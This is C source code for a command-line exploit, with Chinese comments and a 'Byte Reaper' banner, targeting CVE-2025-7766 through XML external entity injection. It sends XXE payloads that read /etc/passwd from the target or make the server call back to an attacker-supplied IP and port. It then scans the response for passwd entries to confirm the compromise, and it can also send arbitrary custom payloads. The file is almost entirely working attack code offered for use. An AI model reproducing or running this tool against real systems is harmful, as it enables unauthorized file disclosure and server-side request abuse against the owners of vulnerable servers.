1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
|
#include<stdio.h>
#include<string.h>
#include"argparse.h"
#include<curl/curl.h>
#include<stdlib.h>
#include<unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#define FULL_URL 3000
#define SIZE_PAYLOAD 4000
const char *yourIp = NULL;
const char *url = NULL;
int yourPort = 0;
int selecetCookie = 0;
int verbose = 0;
int loop = 0;
int selectPayload = 0;
const char *yourPayload = NULL;
char full[FULL_URL];
int requestPayload = 0;
const char *cookies = NULL;
// 系统调用退出函数
void exitSyscall() {
__asm__ volatile (
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
// 内存结构体用于存储HTTP响应
struct Mem {
char *buffer;
size_t len;
};
// CURL写回调函数
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) {
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL) {
printf("\e[1;31m[-] 内存分配失败!\e[0m\n");
exitSyscall();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
// XML POST请求函数
void xmlPost(const char *fullUrl, const char *yourIp, int yourPort) {
char payload[SIZE_PAYLOAD];
struct Mem response = { NULL, 0 };
// payload选择逻辑
if (selectPayload) {
int s = snprintf(payload, sizeof(payload), yourPayload);
if (s < 0 || s >= sizeof(payload)) {
printf("\e[1;31m[-] 检查payload长度!\e[0m\n");
exitSyscall();
}
}
if (requestPayload) {
printf("\e[1;37m[+] 选择的Payload: 发送请求Payload\e[0m\n");
printf("\e[1;34m[+] 请检查服务器状态\e[0m\n");
const char *payloadR =
"<?xml version=\"1.0\"?>\n"
"<!DOCTYPE doc [\n"
" <!ENTITY xxe SYSTEM \"http://%s:%d/xxe.test\">\n"
"]>\n"
"<config>\n"
" <doc>&xxe;</doc>\n"
"</config>\n";
int r = snprintf(payload, sizeof(payload), payloadR, yourIp, yourPort);
if (r < 0 || r >= sizeof(payload)) {
printf("\e[1;31m[-] 构建payloadR错误\n");
exitSyscall();
}
} else {
printf("\e[1;37m[+] 选择的Payload: 读取文件 /etc/passwd\e[0m\n");
const char *autoPayload =
"<?xml version=\"1.0\"?>\n"
"<!DOCTYPE doc [\n"
" <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n"
"]>\n"
"<config>\n"
" <doc>&xxe;</doc>\n"
"</config>\n";
snprintf(payload, sizeof(payload), autoPayload);
}
// CURL初始化
CURL *curl = curl_easy_init();
if (curl == NULL) {
printf("\e[1;31m[-] 创建CURL对象错误!\e[0m\n");
exitSyscall();
}
response.buffer = NULL;
response.len = 0;
if (verbose) {
printf("\e[1;35m==========================================\e[0m\n");
printf("[+] 清理响应...\n");
printf("[+] 响应缓冲区: %s\n", response.buffer);
printf("[+] 响应长度: %zu\n", response.len);
printf("\e[1;35m==========================================\e[0m\n");
}
CURLcode res;
if (curl) {
// 设置CURL选项
curl_easy_setopt(curl, CURLOPT_URL, fullUrl);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, strlen(payload));
if (selecetCookie) {
curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies);
curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies);
}
curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
sleep(1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
if (verbose) {
printf("\e[1;35m------------------------------------------[详细模式]------------------------------------------\e[0m\n");
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
// 设置HTTP头
struct curl_slist *headers = NULL;
headers = curl_slist_append(headers, "Accept-Language: en-US,en");
headers = curl_slist_append(headers, "Connection: keep-alive");
headers = curl_slist_append(headers, "Referer: http://example.com");
headers = curl_slist_append(headers, "Content-Type: application/xml");
double totalTime;
res = curl_easy_perform(curl);
if (res == CURLE_OK) {
curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &totalTime);
printf("\e[1;32m[+] 响应延迟: %f\n", totalTime);
printf("\e[1;36m[+] 请求发送成功\e[0m\n");
printf("\e[1;34m[+] 完整URL: %s\e[0m\n", full);
if (verbose) {
printf("\e[1;35m---------------------------[Payload数据]---------------------------\e[0m\n");
printf("[+] POST数据: %s\n", payload);
printf("\e[1;35m-----------------------------------------------------------------\e[0m\n");
}
long httpCode = 0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode);
if (httpCode >= 200 && httpCode < 300) {
printf("\e[1;34m[+] 服务器可能存在漏洞 (CVE-2025-7766)!\e[0m\n");
printf("\e[1;34m[+] 请检查反向Shell连接 (端口 -> %d)\e[0m\n", yourPort);
printf("[+] HTTP状态码 (200-299范围内)!\e[0m\n");
printf("\e[1;32m[+] HTTP状态码: %ld\e[0m\n", httpCode);
printf("\e[1;35m====================================[响应内容]====================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[+] 响应长度: %zu\e[0m\n", response.len);
printf("\e[1;35m===================================================================================\e[0m\n\n");
// 关键词检测
const char *keywords[] = {
"root:x:0:0",
":/bin/bash",
":/home/",
"daemon:x:",
"nobody:x:",
":x:1000:",
"/usr/sbin/nologin",
"sys:x:",
"bin:x:",
"mail:x:"
};
printf("\e[1;34m[+] 检查响应中的关键词...\e[0m\n");
int numberKeyword = sizeof(keywords) / sizeof(keywords[0]);
int found = 0;
for (int f = 0; f < numberKeyword; f++) {
if (strstr(response.buffer, keywords[f]) != NULL) {
printf("\e[1;33m[+] 在响应中找到关键词: %s\e[0m\n", keywords[f]);
found = 1;
} else {
found = 0;
}
}
if (found) {
printf("\e[1;36m[+] 服务器存在CVE-2025-7766漏洞\e[0m\n");
} else {
printf("\e[1;31m[-] 未在响应中找到关键词!\e[0m\n");
}
} else {
printf("\e[1;31m[-] HTTP状态码: %ld\e[0m\n", httpCode);
printf("\e[1;31m[-] 请检查URL (%s)!\e[0m\n", fullUrl);
if (verbose) {
printf("\e[1;35m====================================[响应内容]====================================\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[+] 响应长度: %zu\e[0m\n", response.len);
printf("\e[1;35m===================================================================================\n\n");
}
}
curl_slist_free_all(headers);
curl_easy_cleanup(curl);
} else {
printf("\e[1;31m[-] 请求发送失败!\e[0m\n");
printf("\e[1;31m[-] 错误: %s\e[0m\n", curl_easy_strerror(res));
if (verbose) {
printf("\e[1;31m[-] 执行系统调用退出...\e[0m\n");
}
curl_slist_free_all(headers);
curl_easy_cleanup(curl);
exitSyscall();
}
}
if (response.buffer) {
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
curl_easy_cleanup(curl);
}
// 主函数
int main(int argc, const char **argv) {
// 显示banner
printf(
"\e[1;91m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖\n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▖▙▖\n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▙▌▙▌\n"
"\e[1;97m\t Byte Reaper\e[0m\n"
);
printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n");
// 命令行参数解析
struct argparse_option options[] = {
OPT_HELP(),
OPT_STRING('u', "url", &url, "目标URL(完整URL)"),
OPT_STRING('c', "cookies", &cookies, "cookie文件"),
OPT_BOOLEAN('v', "verbose", &verbose, "详细模式"),
OPT_STRING('i', "ip", &yourIp, "输入您的IP地址"),
OPT_INTEGER('p', "port", &yourPort, "输入端口号"),
OPT_INTEGER('l', "loop", &loop, "请求发送次数"),
OPT_STRING('b', "payload", &yourPayload, "输入自定义Payload"),
OPT_BOOLEAN('r', "request", &requestPayload, "向服务器发送请求的Payload"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse, options, NULL, 0);
argparse_parse(&argparse, argc, argv);
// 参数验证
if (!url || !yourIp || yourPort == 0) {
printf("\e[1;31m[-] 请输入目标URL、IP地址和端口号!\e[0m\n");
printf("\e[1;31m[-] 示例: ./exploit -u https://ip:port/path -i IP -p PORT\e[0m\n");
printf("\e[1;31m[-] 退出...\e[0m\n");
exitSyscall();
}
strncpy(full, url, FULL_URL - 1);
full[FULL_URL - 1] = '\0';
// IP地址验证
in_addr_t value = inet_addr(yourIp);
if (value == INADDR_NONE) {
printf("\e[1;31m[-] 无效的IP地址!\e[0m\n");
exitSyscall();
}
// 端口验证
if (yourPort < 1 || yourPort > 65535) {
printf("\e[1;31m[-] 无效的端口号,退出...\e[0m\n");
exitSyscall();
}
// URL协议验证
if (strncmp(full, "http://", 7) != 0 && strncmp(full, "https://", 8) != 0) {
printf("\e[1;31m[-] 无效的URL!必须以http://或https://开头\e[0m\n");
exitSyscall();
}
if (verbose) {
verbose = 1;
}
if (cookies) {
selecetCookie = 1;
}
if (requestPayload) {
requestPayload = 1;
}
// 循环发送请求
if (loop) {
printf("\e[1;36m[+] 循环参数运行中...\e[0m\n");
printf("\e[1;36m[+] 循环次数: %d\e[0m\n", loop);
printf("------------------------------------------------------\n");
for (int o = 0; o < loop; o++) {
printf("[%d]: \n", o);
xmlPost(full, yourIp, yourPort);
printf("------------------------------------------------------\n");
}
}
if (yourPayload) {
selectPayload = 1;
} else {
xmlPost(full, yourIp, yourPort);
}
return 0;
}
|